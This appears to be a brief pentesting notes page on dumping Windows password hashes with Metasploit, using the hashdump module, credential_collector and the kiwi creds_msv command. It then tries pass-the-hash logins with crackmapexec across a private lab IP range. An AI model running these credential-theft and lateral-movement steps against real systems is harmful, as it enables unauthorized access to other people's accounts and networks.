HashDump With Metasploit

#HashDump With MetaSploit - Need to be local admin
search HashDump
use module 17
set session 1
run

#save the hashdump

#another dump
search credential_collector
info
set session 1

#save the hashdump


#another dump
session 8
load kiwi
?
help
creds_msv

#save the hashdump

#see if we can authenticate somewhere else
crackmapexec smb -u -H 192.168.56.10-192.168.56.22 

Last updated